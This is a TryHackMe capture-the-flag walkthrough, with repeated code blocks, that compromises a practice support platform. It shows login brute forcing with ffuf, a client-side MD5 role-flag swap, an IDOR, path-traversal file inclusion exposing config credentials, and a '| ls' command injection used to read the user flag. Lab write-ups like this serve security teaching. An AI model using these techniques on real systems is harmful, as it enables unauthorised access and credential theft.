TryHackMe: Support Ops Platform Walkthrough

Difficulty: Medium

Introduction

In this room, we attack a vulnerable internal support platform by exploiting multiple web application vulnerabilities. Throughout the assessment, we exploit weak authentication, insecure direct object references, local file inclusion, and command injection to gain remote code execution and ultimately retrieve both flags.

Task 1: Reconnaissance

Before interacting with the target, let's store the machine IP in an environment variable.

export IP=<Target_IP>

export IP=<Target_IP>

Port Scanning

The first step is identifying exposed services.

nmap -sC -sV -p- -T4 $IP -oN nmap_scan.txt

nmap -sC -sV -p- -T4 $IP -oN nmap_scan.txt

Results

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))

Analysis

Two services are exposed:

• SSH (22) running OpenSSH 9.6p1
• HTTP (80) running Apache 2.4.58

Since web applications typically provide the largest attack surface, we'll focus our attention on port 80.

Directory Enumeration

Next, perform directory brute forcing to discover hidden resources.

gobuster dir -u http://$IP \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,js,bak,zip,json

gobuster dir -u http://$IP \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,js,bak,zip,json

Results

/index.php
/info.php
/footer.php
/skins
/includes
/layout
/js
/api.php
/logout.php
/config.php
/dashboard.php

/index.php
/info.php
/footer.php
/skins
/includes
/layout
/js
/api.php
/logout.php
/config.php
/dashboard.php

Several interesting files were discovered, particularly:

• dashboard.php
• api.php
• config.php

These will become important later.

Task 2: Initial Access

Visiting the homepage reveals the following message:

Contact IT Operations @ help@support.thm

This suggests a valid username or email address exists on the system. Let's test it against the login form.

Password Discovery

Using FFUF, we can brute force the password field while keeping the email fixed.

ffuf -u http://$IP \
-w /usr/share/wordlists/rockyou.txt \
-X POST \
-d "email=help@support.thm&password=FUZZ" \
-H "Content-Type: application/x-www-form-urlencoded" \
-fr "Invalid credentials"

ffuf -u http://$IP \
-w /usr/share/wordlists/rockyou.txt \
-X POST \
-d "email=help@support.thm&password=FUZZ" \
-H "Content-Type: application/x-www-form-urlencoded" \
-fr "Invalid credentials"

After a short time, FFUF identifies a valid password: Snoopy

Log in using:

Email: help@support.thm Password: Snoopy

Task 3: Privilege Escalation via Client-Side Controls

After logging in, nothing immediately stands out.

A good habit during web assessments is checking browser storage.

Opening Local Storage reveals:

isITUser=68934a3e9455fa72420237eb05902327

isITUser=68934a3e9455fa72420237eb05902327

The value corresponds to: **false (**encoded as an MD5 hash).

Original Value

false
MD5: 68934a3e9455fa72420237eb05902327

false
MD5: 68934a3e9455fa72420237eb05902327

Replace With

true
MD5: b326b5062b2f0e69046810717534cb09

true
MD5: b326b5062b2f0e69046810717534cb09

After replacing the value and refreshing the page, a hidden IT administration panel becomes available.

This is a classic example of trusting client-side authorization controls.

Task 4: Exploiting an IDOR

The newly accessible panel displays a user profile endpoint:

Whenever numeric identifiers are exposed, testing for an Insecure Direct Object Reference (IDOR) is worthwhile.

Change:

/user/3

/user/3

to:

/user/1

/user/1

The application returns details for another user.

Among the information exposed is the administrator's email: specialadmin@support.thm

At this stage, we had successfully identified the administrator's email address, but the password remained unknown. After attempting several common attack vectors, including password brute forcing, no valid credentials were recovered.

Since obtaining the password directly was proving unsuccessful, the next step was to continue enumerating the application and look for additional vulnerabilities that could reveal sensitive information or provide an alternative path to administrator access.

Task 5: Local File Inclusion

While exploring the dashboard, a theme-switching feature catches our attention.

Changing themes updates the URL:

dashboard.php?skin=red

dashboard.php?skin=red

Theme parameters are frequently vulnerable to path traversal or local file inclusion.

Testing:

dashboard.php?skin=../config

dashboard.php?skin=../config

causes visible changes to the page.

Inspecting the source code reveals sensitive configuration data, including credentials and internal application information.

Task 6: Administrator Access

Using the credentials recovered from the configuration file, attempt to log in as the administrator.

Initially, the login fails repeatedly.

After further testing, it becomes apparent that the application strips the @ character from passwords before validation.

Removing the @ from the recovered password allows successful authentication.

We now have administrator access.

The first flag can be found directly on the admin dashboard.

Task 7: Command Injection

While exploring the admin interface, a new time widget appears.

Inspecting the source code reveals a PHP snippet that references an internal database path.

Interacting with the widget sends requests to the backend API.

Attempting a normal command: ls

returns an error indicating that only date-related functions are permitted.

To test for command injection, append a pipe operator:

| ls

| ls

This bypasses the restriction and executes a shell command.

The server responds with a directory listing, confirming command execution.

At this point, we have a working command injection vulnerability.

Task 8: Database Enumeration

Using the database path discovered earlier through the LFI vulnerability, we can inspect the application's stored credentials.

Interestingly, the administrator password stored in the database does not contain the @ character that caused issues during login.

This confirms that the login functionality itself is modifying user input before validation.

Task 9: Retrieving the User Flag

Since arbitrary commands can now be executed through the API endpoint, reading files becomes trivial.

Retrieve the user flag:

cat /home/ubuntu/user.txt

cat /home/ubuntu/user.txt

The contents of the file reveal the second flag.

Conclusion

This room demonstrates how multiple low and medium-severity vulnerabilities can be chained together to achieve full compromise:

1. Weak password authentication
2. Client-side authorization bypass
3. IDOR
4. Local File Inclusion
5. Information disclosure
6. Command Injection

By combining these flaws, we successfully escalated from a standard support account to administrator access and ultimately achieved remote command execution on the target system.